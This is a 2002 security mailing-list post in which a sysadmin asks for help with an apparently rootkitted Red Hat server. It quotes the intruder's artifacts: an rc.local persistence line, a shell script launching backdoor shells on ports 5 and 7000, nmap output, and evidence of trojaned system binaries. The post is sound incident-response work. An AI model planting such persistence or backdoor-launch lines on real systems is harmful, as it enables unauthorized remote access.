hpd, afb, sc, and sn

From: Gordon Chamberlin <glac(at)visualize.com>
Date: Fri Dec 20 2002 - 16:11:31 EST

I found suspicious looking files on a Redhat 7.1 Linux server earlier today. Can anyone confirm or deny that the machine has been hacked?

The files:
/usr/bin/hpd
/usr/bin/afb
/usr/bin/sn

The following line is in /etc/rc.local:
/usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null

The contents of hpd are:
#!/bin/sh
/usr/bin/./afb -f /bin/sc -q -p 5 -h /bin/hk >/dev/null
/usr/bin/./afb -f /bin/sc -q -p 7000 -h /bin/hk >/dev/null

namp reports the following ports open:

Port       State       Service
5/tcp      open        rje                     

22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open sunrpc 443/tcp open https 808/tcp open unknown 1024/tcp open kdm 3306/tcp open mysql 7000/tcp open afs3-fileserver 8009/tcp open ajp13

According to an rpm -V, all kinds of binaries have been changed: ps, top, netstat, ifconfig, ...

I copied a good version of ps in and found the two afb processes running.

Anyone know about this hack, what afb does and/or how they usually get in?

Embarrassedly,
 -Gordon

-- 
  Gordon Chamberlin             Software Architect
  Visualize, Inc.               
http://www.visualize.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: 
http://aris.securityfocus.com

Received on Fri Dec 20 17:13:40 2002